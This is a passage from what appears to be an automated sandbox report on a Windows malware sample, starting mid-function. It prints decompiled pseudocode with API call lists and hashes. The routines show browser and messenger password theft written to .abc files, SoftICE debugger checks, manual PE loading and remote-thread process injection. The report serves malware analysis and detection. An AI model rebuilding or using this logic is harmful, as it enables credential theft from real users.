                                    									_t297 = _v32;
                                    									E00401B14(0x40f1ec, _v32);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v36);
                                    										E00401D58( &_v36, "MSN.abc");
                                    										_t297 =  *0x40f1ec;
                                    										_pop(_t282);
                                    										E00405D70(_v36, _t267, _t282,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409EF8( &_v40, _t267, _t297, _t320, _t323);
                                    									E00401B14(0x40f1ec, _v40);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v44);
                                    										E00401D58( &_v44, "FIREFOX.abc");
                                    										_pop(_t281);
                                    										E00405D70(_v44, _t267, _t281,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A84( &_v48);
                                    									E00401B14(0x40f1ec, _v48);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v52);
                                    										E00401D58( &_v52, "IELOGIN.abc");
                                    										_pop(_t280);
                                    										E00405D70(_v52, _t267, _t280,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A90( &_v56);
                                    									E00401B14(0x40f1ec, _v56);
                                    									__eflags =  *0x40f1ec;
                                    									if(__eflags != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v60);
                                    										E00401D58( &_v60, "IEPASS.abc");
                                    										_pop(_t279);
                                    										E00405D70(_v60, _t267, _t279,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A9C( &_v64, _t320, _t323, __eflags, _t335);
                                    									E00401B14(0x40f1ec, _v64);
                                    									__eflags =  *0x40f1ec;
                                    									if(__eflags != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v68);
                                    										E00401D58( &_v68, "IEAUTO.abc");
                                    										_pop(_t278);
                                    										E00405D70(_v68, _t267, _t278,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409AB8( &_v72, _t320, _t323, __eflags);
                                    									E00401B14(0x40f1ec, _v72);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v76);
                                    										E00401D58( &_v76, "IEWEB.abc");
                                    										_pop(_t277);
                                    										E00405D70(_v76, _t267, _t277,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									goto L44;
                                    								}
                                    								_t325 = _t71 >> 1;
                                    								goto L67;
                                    							}
                                    							_t261 =  *_t322;
                                    							_t322 = _t322 - 0xfffffffc;
                                    							asm("adc ebx, ebx");
                                    							if(_t322 < 0) {
                                    								goto L62;
                                    							}
                                    							L56:
                                    							_t65 = _t65 - 1;
                                    							_t259 = _t261 + _t261;
                                    							if(_t259 == 0) {
                                    								_t259 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t260 = _t259 + _t259;
                                    							if(_t260 == 0) {
                                    								_t260 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t261 = _t260 + _t260;
                                    							_t332 = _t261;
                                    							if(_t332 >= 0) {
                                    								goto L56;
                                    							}
                                    						}
                                    						L47:
                                    						_t259 = _t259 + _t259;
                                    						__eflags = _t259;
                                    					} while (_t259 != 0);
                                    				}
                                    			}
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000
                                    0x0040be60
                                    0x00455c8f
                                    0x00000000
                                    0x00455c8f
                                    0x00455c53
                                    0x00455c55
                                    0x00455c58
                                    0x00455c5a
                                    0x00000000
                                    0x00000000
                                    0x00455c5c
                                    0x00455c5c
                                    0x00455c5d
                                    0x00455c5f
                                    0x00455c61
                                    0x00455c63
                                    0x00455c66
                                    0x00455c66
                                    0x00455c68
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c4f
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c39

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00455D52
                                    • GetProcAddress.KERNEL32(?,0044FFF9), ref: 00455D67
                                    • ExitProcess.KERNEL32(?,0044FFF9), ref: 00455D78
                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,7479411C), ref: 00455D95
                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 00455DAA
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction ID: 60ef33331dc92bd8925b533821660d0d47773761dcb7daf1aaa77766f171e575
                                    • Opcode Fuzzy Hash: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction Fuzzy Hash: 2E511A72951B124BD7214EB89CE46B577A4EB12336728073ACDE1C73C7E7A8580E8758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E00403EC0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				long _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				void* _v48;
                                    				signed int _v52;
                                    				long _v56;
                                    				char _v60;
                                    				void* _t116;
                                    				void* _t121;
                                    				void* _t135;
                                    				intOrPtr _t138;
                                    				void* _t150;
                                    				void* _t175;
                                    				signed int _t184;
                                    				signed int _t185;
                                    				intOrPtr _t189;
                                    				intOrPtr _t197;
                                    				intOrPtr _t204;
                                    				intOrPtr _t205;
                                    				signed int _t209;
                                    				signed int _t210;
                                    				void* _t213;
                                    				void* _t216;
                                    				intOrPtr* _t217;
                                    
                                    				_t208 = __edi;
                                    				_t215 = _t216;
                                    				_t217 = _t216 + 0xffffffc8;
                                    				_push(__edi);
                                    				_v44 = __ecx;
                                    				_t183 = __edx;
                                    				_v40 = __eax;
                                    				_t197 =  *0x4037bc; // 0x4037c0
                                    				E0040242C( &_v36, _t197);
                                    				_push(_t216);
                                    				_push(0x4040ba);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t217;
                                    				_push(0);
                                    				_push(_v44);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
                                    				_t116 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1); // executed
                                    				_v16 = _t116;
                                    				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
                                    				_t121 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4); // executed
                                    				_v48 = _t121;
                                    				E00401258(_v44,  *(_v8 + 0x54), _v48);
                                    				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56); // executed
                                    				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
                                    				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t135 >= 0) {
                                    					_v60 = _t135 + 1;
                                    					_t185 = 0;
                                    					do {
                                    						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
                                    						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
                                    						if(_t208 < _v52) {
                                    							_t210 = _t208 ^ _v52;
                                    							_v52 = _v52 ^ _t210;
                                    							_t208 = _t210 ^ _v52;
                                    						}
                                    						_t175 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4); // executed
                                    						_v48 = _t175;
                                    						E00401414(_v48, _t208);
                                    						E00401258( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
                                    						_t185 = _t185 + 1;
                                    						_t66 =  &_v60;
                                    						 *_t66 = _v60 - 1;
                                    					} while ( *_t66 != 0);
                                    				}
                                    				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
                                    				_v28 = _t138;
                                    				_v24 = _t138;
                                    				_v36 = _v16;
                                    				_v32 =  *(_v8 + 0x50);
                                    				_push(0);
                                    				E00402FBC();
                                    				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
                                    				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
                                    					E00403D08(_t145 + _v16, _t215);
                                    				}
                                    				_t147 =  *((intOrPtr*)(_v8 + 0x80));
                                    				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
                                    					E00403D84(_t147 + _v16, _t183, _t208, _t213, _t215); // executed
                                    				}
                                    				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t150 >= 0) {
                                    					_v60 = _t150 + 1;
                                    					_t184 = 0;
                                    					do {
                                    						_t209 = _t184 + _t184 * 4;
                                    						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E00403C98( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56); // executed
                                    						_t184 = _t184 + 1;
                                    						_t101 =  &_v60;
                                    						 *_t101 = _v60 - 1;
                                    					} while ( *_t101 != 0);
                                    				}
                                    				_t189 =  *0x4037bc; // 0x4037c0
                                    				E00402704(_a4, _t189,  &_v36);
                                    				_pop(_t204);
                                    				 *[fs:eax] = _t204;
                                    				_push(E004040C1);
                                    				_t205 =  *0x4037bc; // 0x4037c0
                                    				return E004024F0( &_v36, _t205);
                                    			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00403F17
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F3D
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F67
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403FBF
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 00404082
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction ID: b04bee7947df74310e6e8ccd123ea0b1f62a61930ae828744bf4897096846573
                                    • Opcode Fuzzy Hash: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction Fuzzy Hash: C371D475A00208AFCB10DFA9D981EAEB7F8FF48314F15856AE905F7391D634EA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E00406088(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				int _v20;
                                    				int _v24;
                                    				long _t35;
                                    				long _t46;
                                    				intOrPtr _t66;
                                    				void* _t72;
                                    				char* _t73;
                                    				void* _t76;
                                    
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t72 = __eax;
                                    				_t60 = _a4;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				E00401F38(_a8);
                                    				_push(_t76);
                                    				_push(0x406167);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t76 + 0xffffffec;
                                    				E00401B14(_a4, _a8);
                                    				_t35 = RegOpenKeyExA(_t72, E00401F48(_v8), 0, 1,  &_v16); // executed
                                    				if(_t35 == 0) {
                                    					_t73 = E00401F48(_v12);
                                    					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
                                    					if(_t46 == 0) {
                                    						E00402074(_t60, _v24);
                                    						RegQueryValueExA(_v16, _t73, 0,  &_v20, E00401F48( *_t60),  &_v24); // executed
                                    						E00402074(_t60, _v24 - 1);
                                    					}
                                    					RegCloseKey(_v16); // executed
                                    				}
                                    				_pop(_t66);
                                    				 *[fs:eax] = _t66;
                                    				_push(E0040616E);
                                    				E00401AE4( &_v12, 2);
                                    				return E00401AC0( &_a8);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction ID: 0e00d036d103dc2b2ef1cfb5c67197bce49365ef8cbb96d3ced269820940c9d9
                                    • Opcode Fuzzy Hash: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction Fuzzy Hash: 3021E075A00109BBDB00EBA9CC82EAE77BCEF49354F504176B914F72D1D778AE058764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E00405D70(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				long _v16;
                                    				void* _t17;
                                    				void* _t28;
                                    				intOrPtr _t33;
                                    				long _t36;
                                    				void* _t39;
                                    
                                    				_t36 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				E00401F38(_v12);
                                    				_push(_t39);
                                    				_push(0x405e0a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t39 + 0xfffffff4;
                                    				_t17 = CreateFileA(E00401F48(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
                                    				_t28 = _t17;
                                    				if(_t28 != 0xffffffff) {
                                    					if(_t36 == 0xffffffff) {
                                    						SetFilePointer(_t28, 0, 0, 0);
                                    					}
                                    					WriteFile(_t28, E00401F9C( &_v12), _t36,  &_v16, 0); // executed
                                    					CloseHandle(_t28); // executed
                                    				}
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E00405E11);
                                    				return E00401AE4( &_v12, 2);
                                    			}

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction ID: 55d088da9265c3b5ae2f525a133c65af5c973924d17bad78a6645e8f940914b1
                                    • Opcode Fuzzy Hash: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction Fuzzy Hash: F1116D70A407047AE720BB75CC83F9F76ACDB05728FA04677B510B62E2DA786E00896C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405850() {
                                    				void* _t1;
                                    				void* _t4;
                                    
                                    				_t4 = 0;
                                    				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                    				if(_t1 != 0xffffffff) {
                                    					CloseHandle(_t1);
                                    					_t4 = 1;
                                    				}
                                    				return _t4;
                                    			}

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040586A
                                    • CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405875
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\NTICE
                                    • API String ID: 3498533004-2502798147
                                    • Opcode ID: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction ID: dcdfadaa743e4582149ecbcd816e92e043e7093f062ec94bd67b511fcc83bcd2
                                    • Opcode Fuzzy Hash: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction Fuzzy Hash: 27D0CAB238170039F83438A92C97F1A440C9701B29EA0833ABB20BA1E1C4A8AA29021C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405814() {
                                    				void* _t1;
                                    				void* _t4;
                                    
                                    				_t4 = 0;
                                    				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                    				if(_t1 != 0xffffffff) {
                                    					CloseHandle(_t1);
                                    					_t4 = 1;
                                    				}
                                    				return _t4;
                                    			}

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040582E
                                    • CloseHandle.KERNEL32(00000000,\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405839
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\SICE
                                    • API String ID: 3498533004-948585333
                                    • Opcode ID: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction ID: 3ad54f1ae86a7dc7f46777f6809a8286594d703ee9eb335483981d0cf1385b1e
                                    • Opcode Fuzzy Hash: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction Fuzzy Hash: B8D012723C170039F83038A51C97F07400C5701B2DEB08336BB10BD1E1C4F8B619051C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E00405A28(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v9;
                                    				void* _t13;
                                    				int _t24;
                                    				intOrPtr _t36;
                                    				intOrPtr _t37;
                                    				CHAR* _t40;
                                    				void* _t42;
                                    				void* _t43;
                                    				intOrPtr _t44;
                                    				void* _t45;
                                    
                                    				_t45 = __eflags;
                                    				_t42 = _t43;
                                    				_t44 = _t43 + 0xfffffff8;
                                    				_push(__ebx);
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t42);
                                    				_push(0x405ac7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t44;
                                    				_v9 = 0;
                                    				_t13 = E00405D04(_v8, __ebx, _t45); // executed
                                    				if(_t13 != 0) {
                                    					_push(_t42);
                                    					_push(0x405aa7);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t44;
                                    					_t40 = E00401F48(_v8);
                                    					GetFileAttributesA(_t40); // executed
                                    					SetFileAttributesA(_t40, 0); // executed
                                    					_t24 = DeleteFileA(_t40); // executed
                                    					asm("sbb eax, eax");
                                    					_v9 = _t24 + 1;
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    				}
                                    				_pop(_t36);
                                    				 *[fs:eax] = _t36;
                                    				_push(E00405ACE);
                                    				return E00401AC0( &_v8);
                                    			}

                                    APIs
                                      • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                      • Part of subcall function 00405D04: FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A73
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A89
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A8F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction ID: 1c4186debc08bb4691b9d877f2086b3288a94b326db33eea14d01e2d90e30b07
                                    • Opcode Fuzzy Hash: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction Fuzzy Hash: 52110230324644AED702DB658C12A9F7BECDB0A704F6204BAF400E22D2D67D5E00DA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004038AC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
                                    				void* _v8;
                                    				long _v12;
                                    				long _v16;
                                    				void* _t16;
                                    				void* _t23;
                                    				void* _t31;
                                    				void* _t32;
                                    				void* _t33;
                                    
                                    				_v8 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t33 = E0040387C(__eax, _a8, _v8);
                                    				_t16 = CreateRemoteThread(_t23, 0, 0, E0040387C(_t23, E004037DC(__edx), _t31), _t33, 0,  &_v16); // executed
                                    				_t32 = _t16;
                                    				if(_a4 != 0) {
                                    					WaitForSingleObject(_t32, 0xffffffff);
                                    					ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
                                    				}
                                    				return _t32;
                                    			}

                                    APIs
                                      • Part of subcall function 0040387C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                      • Part of subcall function 0040387C: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
